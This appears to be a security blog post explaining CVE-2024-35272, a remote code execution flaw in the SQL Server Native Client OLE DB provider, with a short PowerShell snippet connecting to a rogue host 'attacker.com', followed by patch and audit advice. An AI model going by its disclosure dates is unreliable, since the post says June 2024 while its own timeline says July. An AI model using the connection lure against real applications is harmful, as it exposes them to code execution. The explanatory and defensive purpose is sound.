In early June 2024, Microsoft disclosed a new high-severity vulnerability involving the SQL Server Native Client OLE DB Provider, tracked as CVE-2024-35272. This post lays out everything you need to know—how attackers can exploit it, which systems are at risk, and what you can do to protect yourself. We'll keep it plain and simple, show sample attack code, and link to important references.
What Is CVE-2024-35272?
CVE-2024-35272 is a *Remote Code Execution* (RCE) vulnerability in Microsoft’s SQL Server Native Client OLE DB provider. If a malicious actor tricks an app into connecting to a specially crafted database, they can run arbitrary code on the victim’s endpoint or server. This means an attacker could take full control of affected systems.
How Does the Attack Work?
The flaw exists in how the Native Client OLE DB Provider handles certain responses from a server when connecting to a malicious database. Specifically, an attacker can set up a rogue server that sends crafted responses, triggering the vulnerability when a victim connects (for example, via a connection string).
Typical attack chain
1. Attacker persuades the victim’s app to connect to a fake database—perhaps using a phishing link or by hijacking a DNS name or host record.
Proof of Concept (PoC) Example
Here’s a simplified way an attacker might lure an app to connect to a malicious server. We provide a short PowerShell example that would attempt to connect using OLEDB:
# WARNING: This is for educational awareness only!
$conn = New-Object -ComObject ADODB.Connection
# This points to a rogue attacker's IP. Never connect to untrusted servers!
$conn.ConnectionString = "Provider=SQLNCLI11;Data Source=attacker.com,1433;Initial Catalog=FakeDB;User Id=sa;Password=pass123;"
try {
$conn.Open()
} catch {
Write-Host "Failed to connect"
}
In a real-world attack, attacker.com would be running a custom SQL server that sends the exploit payload when it senses a connection using the Native Client. This payload, due to the vulnerability, might let the attacker run commands on the connecting host.
References
- Microsoft Security Response Center – CVE-2024-35272
- Microsoft June 2024 Patch Tuesday Summary
- SQL Server Native Client documentation
What Should You Do?
Patch Now:
Microsoft released patches as part of the June 2024 security updates. Update your SQL Server Native Client drivers on all affected systems.
Check for Untrusted Connections:
- Review any app code or configurations that may connect to dynamic or user-provided SQL Server addresses.
Cloud migrations that retain old drivers or expose SQL endpoints to the open internet could get hit.
- In the worst cases, attackers might land ransomware or steal sensitive data right off your production servers.
Conclusion
CVE-2024-35272 is a serious issue. Even if you use SQL Server securely, third-party tools or old scripts could be exposing you right now. Patch immediately, audit your environment, and warn your developers!
Stay safe—and see more at Microsoft’s official advisory page.
Let us know if you have questions or want a quick audit for vulnerable code—share your thoughts in the comments below!
Timeline
Published on: 07/09/2024 17:15:19 UTC
Last modified on: 08/20/2024 15:47:09 UTC